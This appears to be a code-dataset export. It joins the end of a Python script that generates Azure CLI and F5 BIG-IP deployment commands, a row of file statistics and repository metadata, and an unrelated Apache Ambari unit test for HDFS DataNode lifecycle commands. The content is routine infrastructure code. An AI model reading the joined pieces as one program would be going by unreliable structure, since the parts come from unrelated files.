'destination': str(parameters['f5_Ext_Trusted_SubnetPrefix']),
'gateway_address': str(IPAddress(parameters['f5_Int_Untrusted_SubnetPrefix'].first+1)),
'server': str(bigip_int1_pip) },
{ 'name': 'private10',
'destination': '10.0.0.0/8',
'gateway_address': str(IPAddress(parameters['f5_Int_Trusted_SubnetPrefix'].first+1)),
'server': str(bigip_int1_pip) },
{ 'name': 'private172',
'destination': '172.16.0.0/12',
'gateway_address': str(IPAddress(parameters['f5_Int_Trusted_SubnetPrefix'].first+1)),
'server': str(bigip_int1_pip) }
]
output['routes'] = routes
modules = []
modules.append({'module':'afm',
'level':'nominal',
'server':str(bigip_int1_pip)})
modules.append({'module':'afm',
'level':'nominal',
'server':str(bigip_int2_pip)})
modules.append({'module':'asm',
'level':'nominal',
'server':str(bigip_int1_pip)})
modules.append({'module':'asm',
'level':'nominal',
'server':str(bigip_int2_pip)})
modules.append({'module':'apm',
'level':'nominal',
'server':str(bigip_int1_pip)})
modules.append({'module':'apm',
'level':'nominal',
'server':str(bigip_int2_pip)})
output['modules'] = modules
commands = []
commands.append({'check':'tmsh list /ltm profile fastl4 loose_fastL4',
'command':'tmsh create /ltm profile fastl4 loose_fastL4 defaults-from fastL4 loose-close enabled loose-initialization enabled idle-timeout 300 reset-on-timeout disabled',
'server':str(bigip_int1_pip)})
commands.append({'check':'tmsh list /security log profile local-afm-log',
'command':'tmsh create /security log profile local-afm-log { network replace-all-with { local-afm-log { publisher local-db-publisher filter { log-acl-match-accept enabled log-acl-match-drop enabled log-acl-match-reject enabled } } } }',
'server':str(bigip_int1_pip)})
commands.append({'check':'tmsh list /security firewall policy log_all_afm',
'command':'tmsh create /security firewall policy log_all_afm rules add { allow_all { action accept log yes place-before first } deny_all { action reject log yes place-after allow_all }}',
'server':str(bigip_int1_pip)})
commands.append({'check':'tmsh list /ltm virtual-address 0.0.0.0',
'command':'create /ltm virtual-address 0.0.0.0 traffic-group none',
'server':str(bigip_int1_pip)})
commands.append({'check':'tmsh list /ltm virtual-address %s' %(str(parameters['f5_Int_Untrusted_IP'])),
'command':'create /ltm virtual-address %s traffic-group none' %(str(parameters['f5_Int_Untrusted_IP'])),
'server':str(bigip_int1_pip)})
output['commands'] = commands
localcommands = []
localcommands.append({'check':None,
'command': "az network nic ip-config address-pool add --address-pool /subscriptions/%(subscription_id)s/resourceGroups/%(resource_group)s/providers/Microsoft.Network/loadBalancers/f5-ext-alb/backendAddressPools/loadBalancerBackEnd --ids /subscriptions/%(subscription_id)s/resourceGroups/%(resource_group)s_F5_External/providers/Microsoft.Network/networkInterfaces/%(dnsLabel)s-ext0/ipConfigurations/%(dnsLabel)s-self-ipconfig" %({'subscription_id':subscription_id, 'resource_group':resource_group, 'dnsLabel':f5_ext['dnsLabel']})
})
localcommands.append({'check':None,
'command': "az network nic ip-config address-pool add --address-pool /subscriptions/%(subscription_id)s/resourceGroups/%(resource_group)s/providers/Microsoft.Network/loadBalancers/f5-ext-alb/backendAddressPools/loadBalancerBackEnd --ids /subscriptions/%(subscription_id)s/resourceGroups/%(resource_group)s_F5_External/providers/Microsoft.Network/networkInterfaces/%(dnsLabel)s-ext1/ipConfigurations/%(dnsLabel)s-self-ipconfig" %({'subscription_id':subscription_id, 'resource_group':resource_group, 'dnsLabel':f5_ext['dnsLabel']})
})
localcommands.append({'check':None,
'command': "az network nic ip-config address-pool add --address-pool /subscriptions/%(subscription_id)s/resourceGroups/%(resource_group)s/providers/Microsoft.Network/loadBalancers/f5-int-ilb/backendAddressPools/loadBalancerBackEnd --ids /subscriptions/%(subscription_id)s/resourceGroups/%(resource_group)s_F5_Internal/providers/Microsoft.Network/networkInterfaces/%(dnsLabel)s-ext0/ipConfigurations/%(dnsLabel)s-self-ipconfig" %({'subscription_id':subscription_id, 'resource_group':resource_group, 'dnsLabel':f5_int['dnsLabel']})
})
localcommands.append({'check':None,
'command': "az network nic ip-config address-pool add --address-pool /subscriptions/%(subscription_id)s/resourceGroups/%(resource_group)s/providers/Microsoft.Network/loadBalancers/f5-int-ilb/backendAddressPools/loadBalancerBackEnd --ids /subscriptions/%(subscription_id)s/resourceGroups/%(resource_group)s_F5_Internal/providers/Microsoft.Network/networkInterfaces/%(dnsLabel)s-ext1/ipConfigurations/%(dnsLabel)s-self-ipconfig" %({'subscription_id':subscription_id, 'resource_group':resource_group, 'dnsLabel':f5_int['dnsLabel']})
})
output['localcommands'] = localcommands
# print json.dumps(output)
# sys.exit(0)
if options.debug:
print "\n\n#### Azure Infrastructure ####\n\n"
print "az network route-table update --resource-group %s --name %s --set tags.f5_tg=traffic-group-1" %(resource_group,
parameters['f5_Int_Untrust_RouteTableName'])
print "az network route-table update --resource-group %s --name %s --set tags.f5_ha=%s" %(resource_group,
parameters['f5_Int_Untrust_RouteTableName'],
f5_ext['routeTableTag'])
print "az network route-table update --resource-group %s --name %s --set tags.f5_tg=traffic-group-1" %(resource_group,
parameters['internal_Subnets_RouteTableName'])
print "az network route-table update --resource-group %s --name %s --set tags.f5_ha=%s" %(resource_group,
parameters['internal_Subnets_RouteTableName'],
f5_int['routeTableTag'])
print """\n\naz network nsg rule create --nsg-name %(dnsLabel)s-ext-nsg --resource-group %(external_rg)s --priority 1000 -n allow_http --destination-port-ranges 80 --protocol tcp
az network nsg rule create --nsg-name %(dnsLabel)s-ext-nsg --resource-group %(external_rg)s --priority 1001 -n allow_https --destination-port-ranges 443 --protocol tcp
az network nsg rule create --nsg-name %(dnsLabel)s-ext-nsg --resource-group %(external_rg)s --priority 1002 -n allow_rdp --destination-port-ranges 3389 --protocol tcp
az network nsg rule create --nsg-name %(dnsLabel)s-ext-nsg --resource-group %(external_rg)s --priority 1003 -n allow_ssh --destination-port-ranges 22 --protocol tcp
az network nsg rule create --nsg-name %(dnsLabel)s-ext-nsg --resource-group %(external_rg)s --priority 1004 -n allow_moressh --destination-port-ranges 2200-2299 --protocol tcp""" %({'external_rg':f5_ext_resource_group,
'dnsLabel':f5_ext['dnsLabel']})
parameters['resource_group'] = resource_group
print "az network lb create --resource-group %s_F5_External --public-ip-address f5-alb-ext-pip0 --frontend-ip-name loadBalancerFrontEnd0 --backend-pool-name LoadBalancerBackEnd --name f5-ext-alb" %(resource_group)
print "az network lb probe create --lb-name f5-ext-alb -g %s_F5_External --name is_alive --port 80 --protocol Http --path /" %(resource_group)
# print "az network lb address-pool create -g %s --lb-name f5-ext-alb --name LoadBalancerBackEnd" %(resource_group)
print "az network nic ip-config address-pool add --resource-group %s_F5_External --nic-name %s-ext0 --lb-name f5-ext-alb --address-pool LoadBalancerBackEnd --ip-config-name %s-self-ipconfig" %(resource_group, f5_ext['dnsLabel'],f5_ext['dnsLabel'])
print "az network nic ip-config address-pool add --resource-group %s_F5_External --nic-name %s-ext1 --lb-name f5-ext-alb --address-pool LoadBalancerBackEnd --ip-config-name %s-self-ipconfig" %(resource_group, f5_ext['dnsLabel'],f5_ext['dnsLabel'])
print "az network lb rule create --backend-port 22 --frontend-port 22 --lb-name f5-ext-alb -g %s_F5_External --name ssh_vs --protocol Tcp --backend-pool-name LoadBalancerBackEnd --floating-ip true --frontend-ip-name loadBalancerFrontEnd0 --probe-name is_alive" %(resource_group)
print "az network lb create --resource-group %s_F5_External --private-ip-address %s --subnet %s --frontend-ip-name loadBalancerFrontEnd0 --backend-pool-name LoadBalancerBackEnd --name f5-ext-ilb" %(resource_group,
str(parameters['f5_Ext_Untrusted_IP']),subnet.id)
print "az network lb probe create --lb-name f5-ext-ilb -g %s_F5_External --name is_alive --port 80 --protocol Http --path /" %(resource_group)
print "az network nic ip-config address-pool add --resource-group %s_F5_External --nic-name %s-ext0 --lb-name f5-ext-ilb --address-pool LoadBalancerBackEnd --ip-config-name %s-self-ipconfig" %(resource_group, f5_ext['dnsLabel'],f5_ext['dnsLabel'])
print "az network nic ip-config address-pool add --resource-group %s_F5_External --nic-name %s-ext1 --lb-name f5-ext-ilb --address-pool LoadBalancerBackEnd --ip-config-name %s-self-ipconfig" %(resource_group, f5_ext['dnsLabel'],f5_ext['dnsLabel'])
print "az network lb rule create --backend-port 22 --frontend-port 22 --lb-name f5-ext-ilb -g %s_F5_External --name ssh_vs --protocol Tcp --backend-pool-name LoadBalancerBackEnd --floating-ip true --frontend-ip-name loadBalancerFrontEnd0 --probe-name is_alive" %(resource_group)
print "\n\n### Route Table Assocations ###"
print "#external bigip to internal"
print "\n\naz network vnet subnet update --name %(f5_Ext_Trusted_SubnetName)s --vnet-name %(vnetName)s --resource-group %(resource_group)s --route-table %(f5_Ext_Trust_RouteTableName)s" %(parameters)
print "az network vnet subnet update --name %(ipS_Trusted_SubnetName)s --vnet-name %(vnetName)s --resource-group %(resource_group)s --route-table %(ipS_Trust_RouteTableName)s" %(parameters)
print "# from internal bigip to external"
print "az network vnet subnet update --name %(f5_Int_Untrusted_SubnetName)s --vnet-name %(vnetName)s --resource-group %(resource_group)s --route-table %(f5_Int_Untrust_RouteTableName)s" %(parameters)
print "az network vnet subnet update --name %(ipS_Untrusted_SubnetName)s --vnet-name %(vnetName)s --resource-group %(resource_group)s --route-table %(ipS_Untrust_RouteTableName)s" %(parameters)
print "az network vnet subnet update --name %(vdmS_SubnetName)s --vnet-name %(vnetName)s --resource-group %(resource_group)s --route-table %(internal_Subnets_RouteTableName)s" %(parameters)
print "az network vnet subnet update --name %(management_SubnetName)s --vnet-name %(vnetName)s --resource-group %(resource_group)s --route-table %(internal_Subnets_RouteTableName)s" %(parameters)
print "\n\n External VIP: %s %s" %(external_pip[0],external_pip[1])
print "External BIG-IP 1: %s %s" %(bigip_ext_ext1_pip,bigip_ext_ext1_ip)
print "External BIG-IP 2: %s %s\n" %(bigip_ext_ext2_pip,bigip_ext_ext2_ip)
print "Internal BIG-IP 1: %s %s" %(bigip_ext_int1_pip,bigip_ext_int1_ip)
print "Internal BIG-IP 2: %s %s" %(bigip_ext_int2_pip,bigip_ext_int2_ip)
if options.action == "external_setup":
output['route_tables'] = [
# {'resource_group':resource_group,
# 'name':parameters['f5_Int_Untrust_RouteTableName'],
# 'f5_ha':f5_ext['routeTableTag'],
# 'f5_tg':'traffic-group-1'},
{'resource_group':resource_group,
'name':parameters['ipS_Untrust_RouteTableName'],
'f5_ha':f5_ext['routeTableTag'],
'f5_tg':'traffic-group-1'}
]
output['servers'] = [{'server':str(bigip_ext1_pip)},{'server':str(bigip_ext2_pip)}]
print json.dumps(output)
if options.action == "internal_setup":
output['route_tables'] = [{'resource_group':resource_group,
'name':parameters['internal_Subnets_RouteTableName'],
'f5_ha':f5_int['routeTableTag'],
'f5_tg':'traffic-group-1'},
# {'resource_group':resource_group,
# 'name':parameters['f5_Ext_Trust_RouteTableName'],
# 'f5_ha':f5_int['routeTableTag'],
# 'f5_tg':'traffic-group-1',
# 'f5_self':'self_2nic'},
{'resource_group':resource_group,
'name':parameters['ipS_Trust_RouteTableName'],
'f5_ha':f5_int['routeTableTag'],
'f5_tg':'traffic-group-1',
'f5_self':'self_2nic'}]
output['servers'] = [{'server':str(bigip_int1_pip)},{'server':str(bigip_int2_pip)}]
print json.dumps(output)
# u'f5_Ext_Trusted_SubnetPrefix': IPNetwork('192.168.1.0/24'),
# u'f5_Ext_Untrusted_SubnetPrefix': IPNetwork('192.168.0.0/24'),
# u'f5_Int_Trusted_SubnetPrefix': IPNetwork('192.168.3.0/24'),
# u'f5_Int_Untrusted_SubnetPrefix': IPNetwork('192.168.2.0/24'),
# u'gatewaySubnetPrefix': IPNetwork('192.168.255.224/27'),
# u'management_SubnetPrefix': IPNetwork('172.16.0.0/24'),
# u'vdmS_SubnetPrefix': IPNetwork('172.16.1.0/24'),
| 57.50431
| 555
| 0.659208
| 6,656
| 53,364
| 5.039213
| 0.065805
| 0.048061
| 0.037566
| 0.043946
| 0.857488
| 0.799708
| 0.757521
| 0.724993
| 0.704094
| 0.680063
| 0
| 0.024403
| 0.208286
| 53,364
| 927
| 556
| 57.566343
| 0.769486
| 0.095889
| 0
| 0.515556
| 0
| 0.096296
| 0.454661
| 0.093689
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0.004444
| 0.025185
| null | null | 0.09037
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
54ca0830f5c63cce041488887aef926a8107fc57
| 31,715
|
py
|
Python
|
ambari-server/src/test/python/stacks/2.0.6/HDFS/test_datanode.py
|
kennyballou/ambari
|
8985bcf11296d540a861a8634c17d6b9b1accd5a
|
[
"Apache-2.0"
] | null | null | null |
ambari-server/src/test/python/stacks/2.0.6/HDFS/test_datanode.py
|
kennyballou/ambari
|
8985bcf11296d540a861a8634c17d6b9b1accd5a
|
[
"Apache-2.0"
] | null | null | null |
ambari-server/src/test/python/stacks/2.0.6/HDFS/test_datanode.py
|
kennyballou/ambari
|
8985bcf11296d540a861a8634c17d6b9b1accd5a
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
'''
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
from stacks.utils.RMFTestCase import *
import json
from mock.mock import MagicMock, patch
from resource_management.core import shell
from resource_management.core.exceptions import Fail
class TestDatanode(RMFTestCase):
COMMON_SERVICES_PACKAGE_DIR = "HDFS/2.1.0.2.0/package"
STACK_VERSION = "2.0.6"
def test_configure_default(self):
self.executeScript(self.COMMON_SERVICES_PACKAGE_DIR + "/scripts/datanode.py",
classname = "DataNode",
command = "configure",
config_file = "default.json",
hdp_stack_version = self.STACK_VERSION,
target = RMFTestCase.TARGET_COMMON_SERVICES
)
self.assert_configure_default()
self.assertNoMoreResources()
def test_start_default(self):
self.executeScript(self.COMMON_SERVICES_PACKAGE_DIR + "/scripts/datanode.py",
classname = "DataNode",
command = "start",
config_file = "default.json",
hdp_stack_version = self.STACK_VERSION,
target = RMFTestCase.TARGET_COMMON_SERVICES
)
self.assert_configure_default()
self.assertResourceCalled('Directory', '/var/run/hadoop',
owner = 'hdfs',
group = 'hadoop',
mode = 0755
)
self.assertResourceCalled('Directory', '/var/run/hadoop/hdfs',
owner = 'hdfs',
recursive = True,
)
self.assertResourceCalled('Directory', '/var/log/hadoop/hdfs',
owner = 'hdfs',
recursive = True,
)
self.assertResourceCalled('File', '/var/run/hadoop/hdfs/hadoop-hdfs-datanode.pid',
action = ['delete'],
not_if='ls /var/run/hadoop/hdfs/hadoop-hdfs-datanode.pid >/dev/null 2>&1 && ps -p `cat /var/run/hadoop/hdfs/hadoop-hdfs-datanode.pid` >/dev/null 2>&1',
)
self.assertResourceCalled('Execute', "ambari-sudo.sh su hdfs -l -s /bin/bash -c '[RMF_EXPORT_PLACEHOLDER]ulimit -c unlimited ; /usr/lib/hadoop/sbin/hadoop-daemon.sh --config /etc/hadoop/conf start datanode'",
environment = {'HADOOP_LIBEXEC_DIR': '/usr/lib/hadoop/libexec'},
not_if = 'ls /var/run/hadoop/hdfs/hadoop-hdfs-datanode.pid >/dev/null 2>&1 && ps -p `cat /var/run/hadoop/hdfs/hadoop-hdfs-datanode.pid` >/dev/null 2>&1',
)
self.assertNoMoreResources()
@patch("os.path.exists", new = MagicMock(return_value=False))
def test_stop_default(self):
self.executeScript(self.COMMON_SERVICES_PACKAGE_DIR + "/scripts/datanode.py",
classname = "DataNode",
command = "stop",
config_file = "default.json",
hdp_stack_version = self.STACK_VERSION,
target = RMFTestCase.TARGET_COMMON_SERVICES
)
self.assertResourceCalled('Directory', '/var/run/hadoop',
owner = 'hdfs',
group = 'hadoop',
mode = 0755
)
self.assertResourceCalled('Directory', '/var/run/hadoop/hdfs',
owner = 'hdfs',
recursive = True,
)
self.assertResourceCalled('Directory', '/var/log/hadoop/hdfs',
owner = 'hdfs',
recursive = True,
)
self.assertResourceCalled('File', '/var/run/hadoop/hdfs/hadoop-hdfs-datanode.pid',
action = ['delete'],
not_if='ls /var/run/hadoop/hdfs/hadoop-hdfs-datanode.pid >/dev/null 2>&1 && ps -p `cat /var/run/hadoop/hdfs/hadoop-hdfs-datanode.pid` >/dev/null 2>&1',
)
self.assertResourceCalled('Execute', "ambari-sudo.sh su hdfs -l -s /bin/bash -c '[RMF_EXPORT_PLACEHOLDER]ulimit -c unlimited ; /usr/lib/hadoop/sbin/hadoop-daemon.sh --config /etc/hadoop/conf stop datanode'",
environment = {'HADOOP_LIBEXEC_DIR': '/usr/lib/hadoop/libexec'},
not_if = None,
)
self.assertResourceCalled('File', '/var/run/hadoop/hdfs/hadoop-hdfs-datanode.pid',
action = ['delete'],
)
self.assertNoMoreResources()
def test_configure_secured(self):
self.executeScript(self.COMMON_SERVICES_PACKAGE_DIR + "/scripts/datanode.py",
classname = "DataNode",
command = "configure",
config_file = "secured.json",
hdp_stack_version = self.STACK_VERSION,
target = RMFTestCase.TARGET_COMMON_SERVICES
)
self.assert_configure_secured()
self.assertNoMoreResources()
def test_start_secured(self):
self.executeScript(self.COMMON_SERVICES_PACKAGE_DIR + "/scripts/datanode.py",
classname = "DataNode",
command = "start",
config_file = "secured.json",
hdp_stack_version = self.STACK_VERSION,
target = RMFTestCase.TARGET_COMMON_SERVICES
)
self.assert_configure_secured()
self.assertResourceCalled('Directory', '/var/run/hadoop',
owner = 'hdfs',
group = 'hadoop',
mode = 0755
)
self.assertResourceCalled('Directory', '/var/run/hadoop/hdfs',
owner = 'hdfs',
recursive = True,
)
self.assertResourceCalled('Directory', '/var/log/hadoop/hdfs',
owner = 'hdfs',
recursive = True,
)
self.assertResourceCalled('File', '/var/run/hadoop/hdfs/hadoop-hdfs-datanode.pid',
action = ['delete'],
not_if='ls /var/run/hadoop/hdfs/hadoop-hdfs-datanode.pid >/dev/null 2>&1 && ps -p `cat /var/run/hadoop/hdfs/hadoop-hdfs-datanode.pid` >/dev/null 2>&1',
)
self.assertResourceCalled('Execute', 'ambari-sudo.sh [RMF_ENV_PLACEHOLDER] -H -E /usr/lib/hadoop/sbin/hadoop-daemon.sh --config /etc/hadoop/conf start datanode',
environment = {'HADOOP_LIBEXEC_DIR': '/usr/lib/hadoop/libexec'},
not_if = 'ls /var/run/hadoop/hdfs/hadoop-hdfs-datanode.pid >/dev/null 2>&1 && ps -p `cat /var/run/hadoop/hdfs/hadoop-hdfs-datanode.pid` >/dev/null 2>&1',
)
self.assertNoMoreResources()
def test_start_secured_HDP22_root(self):
config_file = self._getSrcFolder()+"/test/python/stacks/2.0.6/configs/secured.json"
with open(config_file, "r") as f:
secured_json = json.load(f)
secured_json['hostLevelParams']['stack_version']= '2.2'
self.executeScript(self.COMMON_SERVICES_PACKAGE_DIR + "/scripts/datanode.py",
classname = "DataNode",
command = "start",
config_dict = secured_json,
hdp_stack_version = self.STACK_VERSION,
target = RMFTestCase.TARGET_COMMON_SERVICES
)
self.assert_configure_secured()
self.assertResourceCalled('Directory', '/var/run/hadoop',
owner = 'hdfs',
group = 'hadoop',
mode = 0755
)
self.assertResourceCalled('Directory', '/var/run/hadoop/hdfs',
owner = 'hdfs',
recursive = True,
)
self.assertResourceCalled('Directory', '/var/log/hadoop/hdfs',
owner = 'hdfs',
recursive = True,
)
self.assertResourceCalled('File', '/var/run/hadoop/hdfs/hadoop-hdfs-datanode.pid',
action = ['delete'],
not_if='ls /var/run/hadoop/hdfs/hadoop-hdfs-datanode.pid >/dev/null 2>&1 && ps -p `cat /var/run/hadoop/hdfs/hadoop-hdfs-datanode.pid` >/dev/null 2>&1',
)
self.assertResourceCalled('Execute', 'ambari-sudo.sh [RMF_ENV_PLACEHOLDER] -H -E /usr/hdp/current/hadoop-client/sbin/hadoop-daemon.sh --config /etc/hadoop/conf start datanode',
environment = {'HADOOP_LIBEXEC_DIR': '/usr/hdp/current/hadoop-client/libexec'},
not_if = 'ls /var/run/hadoop/hdfs/hadoop-hdfs-datanode.pid >/dev/null 2>&1 && ps -p `cat /var/run/hadoop/hdfs/hadoop-hdfs-datanode.pid` >/dev/null 2>&1',
)
self.assertNoMoreResources()
def test_start_secured_HDP22_non_root_https_only(self):
config_file = self._getSrcFolder()+"/test/python/stacks/2.0.6/configs/secured.json"
with open(config_file, "r") as f:
secured_json = json.load(f)
secured_json['hostLevelParams']['stack_version']= '2.2'
secured_json['configurations']['hdfs-site']['dfs.http.policy']= 'HTTPS_ONLY'
secured_json['configurations']['hdfs-site']['dfs.datanode.address']= '0.0.0.0:10000'
secured_json['configurations']['hdfs-site']['dfs.datanode.https.address']= '0.0.0.0:50000'
self.executeScript(self.COMMON_SERVICES_PACKAGE_DIR + "/scripts/datanode.py",
classname = "DataNode",
command = "start",
config_dict = secured_json,
hdp_stack_version = self.STACK_VERSION,
target = RMFTestCase.TARGET_COMMON_SERVICES
)
self.assert_configure_secured()
self.assertResourceCalled('Directory', '/var/run/hadoop',
owner = 'hdfs',
group = 'hadoop',
mode = 0755
)
self.assertResourceCalled('Directory', '/var/run/hadoop/hdfs',
owner = 'hdfs',
recursive = True,
)
self.assertResourceCalled('Directory', '/var/log/hadoop/hdfs',
owner = 'hdfs',
recursive = True,
)
self.assertResourceCalled('File', '/var/run/hadoop/hdfs/hadoop-hdfs-datanode.pid',
action = ['delete'],
not_if='ls /var/run/hadoop/hdfs/hadoop-hdfs-datanode.pid >/dev/null 2>&1 && ps -p `cat /var/run/hadoop/hdfs/hadoop-hdfs-datanode.pid` >/dev/null 2>&1',
)
self.assertResourceCalled('Execute', "ambari-sudo.sh su hdfs -l -s /bin/bash -c '[RMF_EXPORT_PLACEHOLDER]ulimit -c unlimited ; /usr/hdp/current/hadoop-client/sbin/hadoop-daemon.sh --config /etc/hadoop/conf start datanode'",
environment = {'HADOOP_LIBEXEC_DIR': '/usr/hdp/current/hadoop-client/libexec'},
not_if = 'ls /var/run/hadoop/hdfs/hadoop-hdfs-datanode.pid >/dev/null 2>&1 && ps -p `cat /var/run/hadoop/hdfs/hadoop-hdfs-datanode.pid` >/dev/null 2>&1',
)
self.assertNoMoreResources()
@patch("os.path.exists", new = MagicMock(return_value=False))
def test_stop_secured(self):
self.executeScript(self.COMMON_SERVICES_PACKAGE_DIR + "/scripts/datanode.py",
classname = "DataNode",
command = "stop",
config_file = "secured.json",
hdp_stack_version = self.STACK_VERSION,
target = RMFTestCase.TARGET_COMMON_SERVICES
)
self.assertResourceCalled('Directory', '/var/run/hadoop',
owner = 'hdfs',
group = 'hadoop',
mode = 0755
)
self.assertResourceCalled('Directory', '/var/run/hadoop/hdfs',
owner = 'hdfs',
recursive = True,
)
self.assertResourceCalled('Directory', '/var/log/hadoop/hdfs',
owner = 'hdfs',
recursive = True,
)
self.assertResourceCalled('File', '/var/run/hadoop/hdfs/hadoop-hdfs-datanode.pid',
action = ['delete'],
not_if='ls /var/run/hadoop/hdfs/hadoop-hdfs-datanode.pid >/dev/null 2>&1 && ps -p `cat /var/run/hadoop/hdfs/hadoop-hdfs-datanode.pid` >/dev/null 2>&1',
)
self.assertResourceCalled('Execute', 'ambari-sudo.sh [RMF_ENV_PLACEHOLDER] -H -E /usr/lib/hadoop/sbin/hadoop-daemon.sh --config /etc/hadoop/conf stop datanode',
environment = {'HADOOP_LIBEXEC_DIR': '/usr/lib/hadoop/libexec'},
not_if = None,
)
self.assertResourceCalled('File', '/var/run/hadoop/hdfs/hadoop-hdfs-datanode.pid',
action = ['delete'],
)
self.assertNoMoreResources()
@patch("os.path.exists", new = MagicMock(return_value=False))
def test_stop_secured_HDP22_root(self):
config_file = self._getSrcFolder()+"/test/python/stacks/2.0.6/configs/secured.json"
with open(config_file, "r") as f:
secured_json = json.load(f)
secured_json['hostLevelParams']['stack_version']= '2.2'
self.executeScript(self.COMMON_SERVICES_PACKAGE_DIR + "/scripts/datanode.py",
classname = "DataNode",
command = "stop",
config_dict = secured_json,
hdp_stack_version = self.STACK_VERSION,
target = RMFTestCase.TARGET_COMMON_SERVICES
)
self.assertResourceCalled('Directory', '/var/run/hadoop',
owner = 'hdfs',
group = 'hadoop',
mode = 0755
)
self.assertResourceCalled('Directory', '/var/run/hadoop/hdfs',
owner = 'hdfs',
recursive = True,
)
self.assertResourceCalled('Directory', '/var/log/hadoop/hdfs',
owner = 'hdfs',
recursive = True,
)
self.assertResourceCalled('File', '/var/run/hadoop/hdfs/hadoop-hdfs-datanode.pid',
action = ['delete'],
not_if='ls /var/run/hadoop/hdfs/hadoop-hdfs-datanode.pid >/dev/null 2>&1 && ps -p `cat /var/run/hadoop/hdfs/hadoop-hdfs-datanode.pid` >/dev/null 2>&1',
)
self.assertResourceCalled('Execute', 'ambari-sudo.sh [RMF_ENV_PLACEHOLDER] -H -E /usr/hdp/current/hadoop-client/sbin/hadoop-daemon.sh --config /etc/hadoop/conf stop datanode',
environment = {'HADOOP_LIBEXEC_DIR': '/usr/hdp/current/hadoop-client/libexec'},
not_if = None,
)
self.assertResourceCalled('File', '/var/run/hadoop/hdfs/hadoop-hdfs-datanode.pid',
action = ['delete'],
)
self.assertNoMoreResources()
@patch("os.path.exists", new = MagicMock(return_value=False))
def test_stop_secured_HDP22_non_root_https_only(self):
config_file = self._getSrcFolder()+"/test/python/stacks/2.0.6/configs/secured.json"
with open(config_file, "r") as f:
secured_json = json.load(f)
secured_json['hostLevelParams']['stack_version']= '2.2'
secured_json['configurations']['hdfs-site']['dfs.http.policy']= 'HTTPS_ONLY'
secured_json['configurations']['hdfs-site']['dfs.datanode.address']= '0.0.0.0:10000'
secured_json['configurations']['hdfs-site']['dfs.datanode.https.address']= '0.0.0.0:50000'
self.executeScript(self.COMMON_SERVICES_PACKAGE_DIR + "/scripts/datanode.py",
classname = "DataNode",
command = "stop",
config_dict = secured_json,
hdp_stack_version = self.STACK_VERSION,
target = RMFTestCase.TARGET_COMMON_SERVICES
)
self.assertResourceCalled('Directory', '/var/run/hadoop',
owner = 'hdfs',
group = 'hadoop',
mode = 0755
)
self.assertResourceCalled('Directory', '/var/run/hadoop/hdfs',
owner = 'hdfs',
recursive = True,
)
self.assertResourceCalled('Directory', '/var/log/hadoop/hdfs',
owner = 'hdfs',
recursive = True,
)
self.assertResourceCalled('File', '/var/run/hadoop/hdfs/hadoop-hdfs-datanode.pid',
action = ['delete'],
not_if='ls /var/run/hadoop/hdfs/hadoop-hdfs-datanode.pid >/dev/null 2>&1 && ps -p `cat /var/run/hadoop/hdfs/hadoop-hdfs-datanode.pid` >/dev/null 2>&1',
)
self.assertResourceCalled('Execute', "ambari-sudo.sh su hdfs -l -s /bin/bash -c '[RMF_EXPORT_PLACEHOLDER]ulimit -c unlimited ; /usr/hdp/current/hadoop-client/sbin/hadoop-daemon.sh --config /etc/hadoop/conf stop datanode'",
environment = {'HADOOP_LIBEXEC_DIR': '/usr/hdp/current/hadoop-client/libexec'},
not_if = None,
)
self.assertResourceCalled('File', '/var/run/hadoop/hdfs/hadoop-hdfs-datanode.pid',
action=['delete'],
)
self.assertNoMoreResources()
def assert_configure_default(self):
self.assertResourceCalled('Directory', '/etc/security/limits.d',
owner = 'root',
group = 'root',
recursive = True,
)
self.assertResourceCalled('File', '/etc/security/limits.d/hdfs.conf',
content = Template('hdfs.conf.j2'),
owner = 'root',
group = 'root',
mode = 0644,
)
self.assertResourceCalled('XmlConfig', 'hdfs-site.xml',
owner = 'hdfs',
group = 'hadoop',
conf_dir = '/etc/hadoop/conf',
configurations = self.getConfig()['configurations']['hdfs-site'],
configuration_attributes = self.getConfig()['configuration_attributes']['hdfs-site']
)
self.assertResourceCalled('XmlConfig', 'core-site.xml',
owner = 'hdfs',
group = 'hadoop',
conf_dir = '/etc/hadoop/conf',
configurations = self.getConfig()['configurations']['core-site'],
configuration_attributes = self.getConfig()['configuration_attributes']['core-site'],
mode = 0644
)
self.assertResourceCalled('File', '/etc/hadoop/conf/slaves',
content = Template('slaves.j2'),
owner = 'hdfs',
)
self.assertResourceCalled('Directory', '/var/lib/hadoop-hdfs',
owner = 'hdfs',
group = 'hadoop',
mode = 0751,
recursive = True,
)
self.assertResourceCalled('Directory', '/hadoop/hdfs/data',
owner = 'hdfs',
ignore_failures = True,
group = 'hadoop',
mode = 0755,
recursive = True,
cd_access='a'
)
def assert_configure_secured(self):
self.assertResourceCalled('Directory', '/etc/security/limits.d',
owner = 'root',
group = 'root',
recursive = True,
)
self.assertResourceCalled('File', '/etc/security/limits.d/hdfs.conf',
content = Template('hdfs.conf.j2'),
owner = 'root',
group = 'root',
mode = 0644,
)
self.assertResourceCalled('XmlConfig', 'hdfs-site.xml',
owner = 'hdfs',
group = 'hadoop',
conf_dir = '/etc/hadoop/conf',
configurations = self.getConfig()['configurations']['hdfs-site'],
configuration_attributes = self.getConfig()['configuration_attributes']['hdfs-site']
)
self.assertResourceCalled('XmlConfig', 'core-site.xml',
owner = 'hdfs',
group = 'hadoop',
conf_dir = '/etc/hadoop/conf',
configurations = self.getConfig()['configurations']['core-site'],
configuration_attributes = self.getConfig()['configuration_attributes']['core-site'],
mode = 0644
)
self.assertResourceCalled('File', '/etc/hadoop/conf/slaves',
content = Template('slaves.j2'),
owner = 'root',
)
self.assertResourceCalled('Directory', '/var/lib/hadoop-hdfs',
owner = 'hdfs',
group = 'hadoop',
mode = 0751,
recursive = True,
)
